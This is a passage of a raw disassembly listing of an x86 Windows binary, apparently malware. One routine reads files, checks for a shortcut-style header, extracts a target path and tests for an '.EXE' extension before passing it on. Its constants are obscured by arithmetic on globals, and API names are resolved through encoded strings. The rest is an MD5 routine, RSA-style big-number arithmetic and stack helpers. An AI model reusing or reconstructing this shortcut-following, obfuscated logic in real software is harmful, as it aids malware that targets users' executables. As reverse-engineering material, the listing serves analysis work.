call sub_425D7D
lea ecx, [ebp+var_12104]
or eax, 0FFFFFFFFh
loc_424F03: ; CODE XREF: sub_424EDB+2D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_424F03
mov ebx, ds:10014198h
sub ebx, 8
mov esi, eax
sub esi, ebx
mov ebx, ds:10014234h
movsx edx, word ptr ds:100141C0h
add ebx, edx
sub ebx, 0Ch
mov [ebp+esi+var_12104], bl
push 0
mov eax, ds:10014150h
sub eax, 2
push eax
push 3
push 0
mov eax, ds:100140A4h
sub eax, 9
push eax
push 80000001h
lea eax, [ebp+var_12104]
push eax
call dword ptr ds:10013968h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_4251A0
push 0
lea eax, [ebp+var_12110]
push eax
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push edi
call dword ptr ds:1000D02Ch
mov [ebp+var_12108], eax
push edi
call dword ptr ds:1001282Ch
mov eax, ds:10014124h
movsx edx, word ptr ds:10014128h
add eax, edx
sub eax, 7
cmp [ebp+var_12108], eax
jz loc_4251A0
cmp [ebp+var_1FFF], 4Ch
jnz loc_4251A0
movzx esi, [ebp+var_1FB3]
movzx ebx, [ebp+var_1FB2]
movzx ebx, bx
shl ebx, 8
or esi, ebx
mov [ebp+var_1210A], si
movzx eax, [ebp+var_1210A]
movsx edx, word ptr ds:100141F0h
lea eax, [eax+edx+4Ah]
movsx edx, word ptr ds:10014148h
add edx, ds:10014124h
add eax, edx
mov [ebp+var_12000], ax
movzx eax, [ebp+var_12000]
movsx eax, [ebp+eax+var_1FFF]
mov edx, ds:100140B0h
sub edx, 9
cmp eax, edx
jz loc_4251A0
movzx eax, [ebp+var_12000]
mov edx, ds:100141FCh
add edx, 4
add eax, edx
movsx eax, [ebp+eax+var_1FFF]
mov edx, ds:100141C4h
add edx, ds:100141E8h
sub edx, 7
cmp eax, edx
jnz loc_4251A0
movzx eax, [ebp+var_12000]
movsx edx, word ptr ds:10014164h
mov ecx, ds:1001422Ch
lea edx, [edx+ecx+8]
mov ecx, eax
add ecx, edx
movzx edx, [ebp+ecx+var_1FFF]
movsx esi, word ptr ds:10014148h
movsx ebx, word ptr ds:100141B8h
lea esi, [esi+ebx+0Ch]
mov ebx, eax
add ebx, esi
movzx esi, [ebp+ebx+var_1FFF]
movzx esi, si
shl esi, 8
mov ebx, edx
or ebx, esi
mov esi, ebx
movzx esi, si
mov ebx, eax
add ebx, esi
mov esi, ebx
mov [ebp+var_1210C], si
movzx eax, [ebp+var_1210C]
lea eax, [ebp+eax+var_1FFF]
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_425D7D
lea ecx, [ebp+var_11FFE]
or eax, 0FFFFFFFFh
loc_4250D0: ; CODE XREF: sub_424EDB+1FA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4250D0
mov edi, eax
movsx eax, word ptr ds:10014120h
add eax, ds:100141E4h
sub eax, 6
mov edx, edi
sub edx, eax
cmp [ebp+edx+var_11FFE], 2Eh
jnz short loc_425168
mov eax, ds:100141F8h
add eax, ds:1001424Ch
sub eax, 0Ch
mov edx, edi
sub edx, eax
movsx eax, [ebp+edx+var_11FFE]
push eax
call dword ptr ds:1000D034h
add esp, 4
cmp eax, 45h
jnz short loc_425168
mov esi, ds:10014104h
sub esi, 2
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call dword ptr ds:1000D034h
add esp, 4
cmp eax, 58h
jnz short loc_425168
mov esi, ds:10014168h
sub esi, 8
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call dword ptr ds:1000D034h
add esp, 4
cmp eax, 45h
jz short loc_42516A
loc_425168: ; CODE XREF: sub_424EDB+21A�j
; sub_424EDB+243�j ...
jmp short loc_4251A0
; ---------------------------------------------------------------------------
loc_42516A: ; CODE XREF: sub_424EDB+28B�j
push 1001485Ah
call sub_41B08F
push eax
lea edi, [ebp+var_11FFE]
push edi
call dword ptr ds:1000D024h
mov eax, ds:100141ACh
add eax, ds:100140F0h
sub eax, 5
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_423806
add esp, 14h
loc_4251A0: ; CODE XREF: sub_424EDB+84�j
; sub_424EDB+CA�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_424EDB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4251A5 proc near ; CODE XREF: .data:0041AB22�p
; sub_41BF88+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4251BA: ; CODE XREF: sub_4251A5+1A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4251BA
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [eax]
or eax, 0FFFFFFFFh
loc_4251CC: ; CODE XREF: sub_4251A5+2C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4251CC
mov esi, eax
mov eax, ds:100141ECh
sub eax, 6
mov [ebp+var_4], eax
jmp short loc_42523E
; ---------------------------------------------------------------------------
loc_4251E2: ; CODE XREF: sub_4251A5+9F�j
mov eax, ds:100140A8h
movsx edx, word ptr ds:10014220h
mov ebx, eax
add ebx, edx
sub ebx, 0Bh
mov eax, ds:100141F8h
movsx edx, word ptr ds:100140B4h
mov edi, eax
add edi, edx
sub edi, 0Ah
jmp short loc_425237
; ---------------------------------------------------------------------------
loc_42520A: ; CODE XREF: sub_4251A5+94�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+edi]
cmp eax, edx
jnz short loc_42523B
inc ebx
cmp ebx, esi
jnz short loc_425236
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_425236
mov eax, [ebp+var_4]
jmp short loc_42524B
; ---------------------------------------------------------------------------
loc_425236: ; CODE XREF: sub_4251A5+7F�j
; sub_4251A5+8A�j
inc edi
loc_425237: ; CODE XREF: sub_4251A5+63�j
cmp edi, esi
jb short loc_42520A
loc_42523B: ; CODE XREF: sub_4251A5+7A�j
inc [ebp+var_4]
loc_42523E: ; CODE XREF: sub_4251A5+3B�j
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb short loc_4251E2
mov eax, 0FFFFh
loc_42524B: ; CODE XREF: sub_4251A5+8F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4251A5 endp
; =============== S U B R O U T I N E =======================================
sub_425250 proc near ; CODE XREF: .data:0041A7C2�p
push edi
push 1001484Dh
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10010598h
mov ds:10014264h, eax
test eax, eax
jnz short loc_425283
push 10014840h
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10011208h
mov ds:10014264h, eax
loc_425283: ; CODE XREF: sub_425250+1A�j
push 1001482Dh
call sub_41B08F
push eax
push dword ptr ds:10014264h
call dword ptr ds:100101ACh
mov ds:10013D98h, eax
push 10014819h
call sub_41B08F
push eax
push dword ptr ds:10014264h
call dword ptr ds:100101ACh
mov ds:100105D4h, eax
push 10014809h
call sub_41B08F
push eax
push dword ptr ds:10014264h
call dword ptr ds:100101ACh
mov ds:10010084h, eax
push 100147F7h
call sub_41B08F
push eax
push dword ptr ds:10014264h
call dword ptr ds:100101ACh
mov ds:1001008Ch, eax
push 100147E8h
call sub_41B08F
add esp, 14h
push eax
push dword ptr ds:10014264h
call dword ptr ds:100101ACh
mov ds:10013824h, eax
pop edi
retn
sub_425250 endp
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425315 proc near ; CODE XREF: sub_41F48F+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, ds:10015D24h
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_4253E0
xor edx, edx
loc_425345: ; CODE XREF: sub_425315+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_425357
mov edx, [ebp+arg_4]
call sub_425371
loc_425357: ; CODE XREF: sub_425315+38�j
lea edx, ds:10015D24h
call sub_425371
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_425345
popa
pop ebp
retn 10h
sub_425315 endp
; ---------------------------------------------------------------------------
db 2Eh, 8Bh, 0C0h
; =============== S U B R O U T I N E =======================================
sub_425371 proc near ; CODE XREF: sub_425315+3D�p
; sub_425315+48�p
lea edi, ds:10015CE4h
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, ds:10015D24h
call sub_4253E0
loc_42538B: ; CODE XREF: sub_425371+5D�j
lea edi, ds:10015CE4h
mov ecx, 10h
xor eax, eax
loc_425398: ; CODE XREF: sub_425371+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_425398
call sub_4253F1
bt ds:10015D24h, ebx
jnb short loc_4253CD
mov esi, edx
lea edi, ds:10015CE4h
xor eax, eax
mov ecx, 10h
loc_4253BC: ; CODE XREF: sub_425371+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_4253BC
call sub_4253F1
loc_4253CD: ; CODE XREF: sub_425371+3A�j
dec ebx
jns short loc_42538B
mov edi, edx
lea esi, ds:10015CE4h
mov ecx, 10h
rep movsd
retn
sub_425371 endp
; =============== S U B R O U T I N E =======================================
sub_4253E0 proc near ; CODE XREF: sub_425315+29�p
; sub_425371+15�p
mov ebx, 1FFh
loc_4253E5: ; CODE XREF: sub_4253E0+B�j
bt [edi], ebx
jb short locret_4253ED
dec ebx
jnz short loc_4253E5
locret_4253ED: ; CODE XREF: sub_4253E0+8�j
retn
sub_4253E0 endp
; ---------------------------------------------------------------------------
db 2Eh, 8Bh, 0C0h
; =============== S U B R O U T I N E =======================================
sub_4253F1 proc near ; CODE XREF: sub_425371+2E�p
; sub_425371+57�p
lea esi, ds:10015CE4h
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_4253FF: ; CODE XREF: sub_4253F1+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_425428
ja short loc_42540C
dec ecx
jns short loc_4253FF
loc_42540C: ; CODE XREF: sub_4253F1+16�j
mov esi, [ebp+14h]
lea edi, ds:10015CE4h
xor eax, eax
mov ecx, 10h
loc_42541C: ; CODE XREF: sub_4253F1+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_42541C
locret_425428: ; CODE XREF: sub_4253F1+14�j
retn
sub_4253F1 endp
; =============== S U B R O U T I N E =======================================
sub_425429 proc near ; CODE XREF: sub_42547A+32�p
; sub_42547A+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_425429 endp
; =============== S U B R O U T I N E =======================================
sub_425436 proc near ; CODE XREF: sub_42547A+219�p
; sub_42547A+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_425436 endp
; =============== S U B R O U T I N E =======================================
sub_425443 proc near ; CODE XREF: sub_42547A+420�p
; sub_42547A+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_425443 endp
; =============== S U B R O U T I N E =======================================
sub_42544A proc near ; CODE XREF: sub_42547A+627�p
; sub_42547A+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_42544A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425453 proc near ; CODE XREF: sub_41F4A9+73�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_425453 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42547A proc near ; CODE XREF: sub_41F4A9+8C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov ds:10015D64h, eax
mov eax, [edi+4]
mov ds:10015D68h, eax
mov eax, [edi+8]
mov ds:10015D6Ch, eax
mov eax, [edi+0Ch]
mov ds:10015D70h, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425429
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425429
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425429
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425429
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425429
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425429
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425429
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425429
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425429
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425429
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425429
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425429
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425429
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425429
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425429
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425436
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425436
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425436
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425436
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425436
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425436
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425436
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425436
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425436
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425436
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425436
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425436
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425436
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425436
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425436
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425436
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425443
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425443
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425443
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425443
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425443
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425443
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425443
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425443
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425443
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425443
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425443
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425443
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_425443
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_425443
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_425443
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_425443
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42544A
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42544A
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42544A
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42544A
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42544A
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42544A
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42544A
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42544A
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42544A
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42544A
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42544A
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42544A
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42544A
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42544A
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42544A
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42544A
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, ds:10015D64h
add [edi], eax
mov eax, ds:10015D68h
add [edi+4], eax
mov eax, ds:10015D6Ch
add [edi+8], eax
mov eax, ds:10015D70h
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_42547A endp
; =============== S U B R O U T I N E =======================================
sub_425CC5 proc near ; CODE XREF: sub_425CE2+1E�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_425CC6: ; CODE XREF: sub_425CC5+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_425CC6
sub esp, eax
test [esp+0FFCh+var_FFC], eax
push ecx
retn
sub_425CC5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425CE2 proc near ; CODE XREF: sub_41C00F+3A�p
arg_0 = dword ptr 4
pop ecx
pop eax
add eax, 3
shr eax, 2
shl eax, 2
cmp eax, 1000h
jl short loc_425D12
mov edx, esp
push eax
fild [esp-4+arg_0]
mov [esp-4+arg_0], ecx
fild [esp-4+arg_0]
call sub_425CC5
mov esp, edx
push edx
fistp dword ptr [esp+0]
mov ecx, [esp+0]
fistp dword ptr [esp+0]
pop eax
loc_425D12: ; CODE XREF: sub_425CE2+10�j
sub esp, eax
mov eax, esp
mov dword ptr [eax], 0
push ecx
push ecx
retn
sub_425CE2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
dd 40C03100h, 0CC2h, 3CD95000h, 24048B24h, 2434BA0Fh, 0C816608h
db 24h, 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425D4C
loc_425D3B: ; CODE XREF: sub_425D4C+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
loc_425D3F: ; CODE XREF: .data:00425D4A�j
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_425D4C
; ---------------------------------------------------------------------------
push eax
fnstcw word ptr [esp]
pop eax
jmp short loc_425D3F
; =============== S U B R O U T I N E =======================================
sub_425D4C proc near ; CODE XREF: .data:loc_41A5B4�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00425D3B SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_425D3B
sub_425D4C endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_425D5D proc near ; CODE XREF: .data:0041AAE9�p
; sub_41BF88+8�p ...
